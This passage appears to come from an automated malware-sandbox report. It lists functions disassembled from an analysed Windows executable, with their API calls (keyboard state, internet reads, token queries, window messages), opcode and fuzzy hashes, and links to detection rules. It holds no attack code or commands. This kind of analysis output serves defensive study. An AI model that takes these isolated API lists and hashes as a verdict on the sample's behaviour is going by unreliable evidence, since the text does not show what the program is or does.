Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 2aa34fe1dcce5a67d62f05abce7b9367d96316749191500b11aa43431abc7fc0
Instruction ID: f168466efbb62c4508487b639e8f06919ffb83b8fd8d3efe71a78ae749088191
Opcode Fuzzy Hash: 2aa34fe1dcce5a67d62f05abce7b9367d96316749191500b11aa43431abc7fc0
Instruction Fuzzy Hash: F541D435624505AFD725CF38CC5CFAA7BA5EB0A360F14826DF89DA72E0C371AD61CA40

Function 00212051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002120C3
_free.LIBCMT ref: 002120E3

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 86c38bd80cb9b34b8d2d310e064c2e0f21775af9392d3305d07e93016330d4e1
Instruction ID: 2cc3d514b043018f5994da5d6a10c3dfdd5c4d623db97a125722c36c79faf3bb
Opcode Fuzzy Hash: 86c38bd80cb9b34b8d2d310e064c2e0f21775af9392d3305d07e93016330d4e1
Instruction Fuzzy Hash: DA41D432A10204EFCB24DF78C881A9DB7E5EFA9314F254568F615EB352DB31AD65CB80

Function 001F912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 001F9141
ScreenToClient.USER32(00000000,?), ref: 001F915E
GetAsyncKeyState.USER32(00000001), ref: 001F9183
GetAsyncKeyState.USER32(00000002), ref: 001F919D

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 19b0437bd5cfe12251d78c4e5fcb567ea67dfcbbcbc40df0782f8f382d4cabb1
Instruction ID: 7723f5ced676fffc7ff271875fee0d1030bc54b261d81e406807b07150583153
Opcode Fuzzy Hash: 19b0437bd5cfe12251d78c4e5fcb567ea67dfcbbcbc40df0782f8f382d4cabb1
Instruction Fuzzy Hash: FD41517191851BEBDF19AF64C848BFEB774FB05334F20822AE569A2290C7705954CF91

Function 00253874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 002538CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00253922
TranslateMessage.USER32(?), ref: 0025394B
DispatchMessageW.USER32(?), ref: 00253955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00253966

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 5ff73841f1c207faaefd27bf1583a3402bc995f972affb1477a9eebe794702d6
Instruction ID: 5d151c92b56dd1c046391b1348ae73744d98ea6d4e24af78e32465fbfda94d0b
Opcode Fuzzy Hash: 5ff73841f1c207faaefd27bf1583a3402bc995f972affb1477a9eebe794702d6
Instruction Fuzzy Hash: 2931FBB0528347DEEB35CF34A85DBB637E8AB01382F54155DE856C2090E7F096ACCB15

Function 0025CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0025C21E,00000000), ref: 0025CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0025CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0025C21E,00000000), ref: 0025CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0025C21E,00000000), ref: 0025CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0025C21E,00000000), ref: 0025CFF2

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 712f1d6e1b285e89773cfe2e7eb2d22a084140db06e82a93398a6d85ad6bbf25
Instruction ID: 8e7efe7f8c836aba3a72592a5b1e4b1a7251cb3be5f7af312dafde1faa519a50
Opcode Fuzzy Hash: 712f1d6e1b285e89773cfe2e7eb2d22a084140db06e82a93398a6d85ad6bbf25
Instruction Fuzzy Hash: 7231A071610306EFDB24DFA5D884AABBBF9EF10312B20402FF90AD2511EB30AD55DB64

Function 00241901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00241915
PostMessageW.USER32(00000001,00000201,00000001), ref: 002419C1
Sleep.KERNEL32(00000000,?,?,?), ref: 002419C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 002419DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 002419E2

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 14c37ad06f55f97ab76549dcebab8328812c99296f3f6b6b43586fa851195373
Instruction ID: d7af7f8904062522808a8214aaadd4a7a01193c1f36002d920e9ba404f9cf2a8
Opcode Fuzzy Hash: 14c37ad06f55f97ab76549dcebab8328812c99296f3f6b6b43586fa851195373
Instruction Fuzzy Hash: B631A471A1021AEFCB08CFB8DD9DADE7BB5EB44315F104229F925A72D1C77099A4CB90

Function 00275706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00275745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0027579D
_wcslen.LIBCMT ref: 002757AF
_wcslen.LIBCMT ref: 002757BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00275816

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: f2ea028cec47e422c92c66f30f63ab9f1703b5bc15753be5ae4c7190f7ecdcd1
Instruction ID: 99f42ec728ee073a25d49b5194eb98d33397153a4cd9062b6554b57441803a79
Opcode Fuzzy Hash: f2ea028cec47e422c92c66f30f63ab9f1703b5bc15753be5ae4c7190f7ecdcd1
Instruction Fuzzy Hash: C6218471924629DADB209F64DC84AEEF778FF44320F10C216E91D9A1C0D7B089A5CF50

Function 00260930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00260951
GetForegroundWindow.USER32 ref: 00260968
GetDC.USER32(00000000), ref: 002609A4
GetPixel.GDI32(00000000,?,00000003), ref: 002609B0
ReleaseDC.USER32(00000000,00000003), ref: 002609E8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 7fad850415f83cac5f77667fd48c40e9053539fcfc4f52f5a612e272e09a4310
Instruction ID: 62be9c41a94feb7ccbc79ad01bf4cda40b3dae565aaa1c53ade11a7dfa174bdc
Opcode Fuzzy Hash: 7fad850415f83cac5f77667fd48c40e9053539fcfc4f52f5a612e272e09a4310
Instruction Fuzzy Hash: 9421A135610204AFD704EF65DC89AAFBBE9EF44701F10842CE84AA7352CB70AD44CB50

Function 0021CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0021CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021CDE9

Part of subcall function 00213820: RtlAllocateHeap.NTDLL(00000000,?,?,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00213852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0021CE0F
_free.LIBCMT ref: 0021CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0021CE31

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: ab70aabc7ede7ec34c64a1242f84e82e01b3abb24e78a21455f2c88e67779d7a
Instruction ID: dbba5a234119a9c1b5861d1e78e71f033f38c525fae2c9ac4a4f2a2225f499dc
Opcode Fuzzy Hash: ab70aabc7ede7ec34c64a1242f84e82e01b3abb24e78a21455f2c88e67779d7a
Instruction Fuzzy Hash: F501FC766512157F23211AB67C4CCBF79EDDFD6BA1335012DFD09C7200DA608DA181B0

Function 001F9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001F9693
SelectObject.GDI32(?,00000000), ref: 001F96A2
BeginPath.GDI32(?), ref: 001F96B9
SelectObject.GDI32(?,00000000), ref: 001F96E2

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 39aad8ef9f1da9230c1233cccf1911d66a62df29f6a90aae719716d91b35cf0c
Instruction ID: 5ee3917d01c7b4665748f7fc8ef7e6d471338751f3c79ab0c39f9e54a1e716b6
Opcode Fuzzy Hash: 39aad8ef9f1da9230c1233cccf1911d66a62df29f6a90aae719716d91b35cf0c
Instruction Fuzzy Hash: 5F214C70802789EBDB11AF64FC2C7B93BA8BB50366F60031AF514A61B0D37098A5CF94

Function 00245711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00245726
_memcmp.LIBVCRUNTIME ref: 00245744
_memcmp.LIBVCRUNTIME ref: 00245757
_memcmp.LIBVCRUNTIME ref: 0024576F
_memcmp.LIBVCRUNTIME ref: 00245787

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 96734a4e3a7589a620b8e9728010063761d6696a0e23c89d3cca6b6687238116
Instruction ID: 1da747dfacd625b3041764973bde0118919f4fb473397eb6fc1bc2004a7d4f48
Opcode Fuzzy Hash: 96734a4e3a7589a620b8e9728010063761d6696a0e23c89d3cca6b6687238116
Instruction Fuzzy Hash: 24019BA16B5615BBD20C96109E41FBAB35C9B25354B004035FD489A183F6B0ED31C6A1

Function 00212DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(75912E40,?,?,0020F2DE,00213863,?,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00212DFD
_free.LIBCMT ref: 00212E32
_free.LIBCMT ref: 00212E59
SetLastError.KERNEL32(00000000), ref: 00212E66
SetLastError.KERNEL32(00000000), ref: 00212E6F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 00c55d0230e33a59ab4f6c063f78a8623e7dccf1607141725c59d30e1ec60330
Instruction ID: 888ff702767a64a76f04c47c010532131242b37f71e8a3c0792452b1f98124d9
Opcode Fuzzy Hash: 00c55d0230e33a59ab4f6c063f78a8623e7dccf1607141725c59d30e1ec60330
Instruction Fuzzy Hash: 1601F932275601E7C6127B347C89DEB25DAABF13B5B300028F819A22D3EE709CFD4460

Function 0024000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?,?,0024035E), ref: 0024002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?), ref: 00240064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240070

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 3a252fb00bb2b8e909258808ede1daceff0eff4965a0735f5314f3d1a4e963ad
Instruction ID: 058ff987e5dfeac1e80af5be7b53426e78186bfa9b52704504d1bdad9bd76c0a
Opcode Fuzzy Hash: 3a252fb00bb2b8e909258808ede1daceff0eff4965a0735f5314f3d1a4e963ad
Instruction Fuzzy Hash: E601F272610214BFDB214F78EC88BAA7AEDEF44751F245028FE09D3210D770DE808BA0

Function 0024E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0024E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0024E9A5
Sleep.KERNEL32(00000000), ref: 0024E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0024E9B7
Sleep.KERNEL32 ref: 0024E9F3

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: e08e4fd3a702bf6b7fed564a7ef5c34ada0ae138c6c656cc430bc123b1e51607
Instruction ID: 5b1ee4ef138ae2e3eca6fe46e85684be60c229e394c579fcb0a252e371c5b519
Opcode Fuzzy Hash: e08e4fd3a702bf6b7fed564a7ef5c34ada0ae138c6c656cc430bc123b1e51607
Instruction Fuzzy Hash: FE015B31C1152ADBDF049FF5E84DAEDBB78BB08310F51055AE906B2181CB3095A4CB62

Function 002410F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00241114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 0024112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0024114D

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 1c6c0125b645377ba70f25f850100d7acfca0c7ed21384fc59c9a5654df0cf98
Instruction ID: 5dfb7b18326306426db32e37975edfd09bd69fbbf81aed6fc2a37580ec3d5e83
Opcode Fuzzy Hash: 1c6c0125b645377ba70f25f850100d7acfca0c7ed21384fc59c9a5654df0cf98
Instruction Fuzzy Hash: 52011975200206BFDB154FA5EC4DA6A3B6EEF893A1B204429FA49D7360DA31DC909A60

Function 00240FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00240FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00240FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00240FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00240FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00241002

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 72871469708fdfd2ee9716e2909c6e4abd60ce77514fc2fbd8e1ded4d9b07c7f
Instruction ID: 40475bc5776333aa30569bfd6fc434daf93fb72a2d4aa1cba6fa2bcf18035fc1
Opcode Fuzzy Hash: 72871469708fdfd2ee9716e2909c6e4abd60ce77514fc2fbd8e1ded4d9b07c7f
Instruction Fuzzy Hash: 01F04935200312ABDB215FB4AC4DF563FADEF89762F604428FA4DD6251CA70DCA08A60

Function 00241014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0024102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00241036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00241045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0024104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00241062

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: db2974789d52249872c47c770fb2046b8ebf155d4a634e444476624a5dc4cd1a
Instruction ID: b169f48817f54c75d5a2ab2dbb2d811e718b76a098e8c1cb3df9d033ba32c8cf
Opcode Fuzzy Hash: db2974789d52249872c47c770fb2046b8ebf155d4a634e444476624a5dc4cd1a
Instruction Fuzzy Hash: 09F06D35200312EBDB215FB4EC4DF563BADEF89B61F200428FE4DD7250CA70D8A08A60

Function 0021D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0021D752

Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?), ref: 002129DE
Part of subcall function 002129C8: GetLastError.KERNEL32(?,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?,?), ref: 002129F0

_free.LIBCMT ref: 0021D764
_free.LIBCMT ref: 0021D776
_free.LIBCMT ref: 0021D788
_free.LIBCMT ref: 0021D79A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
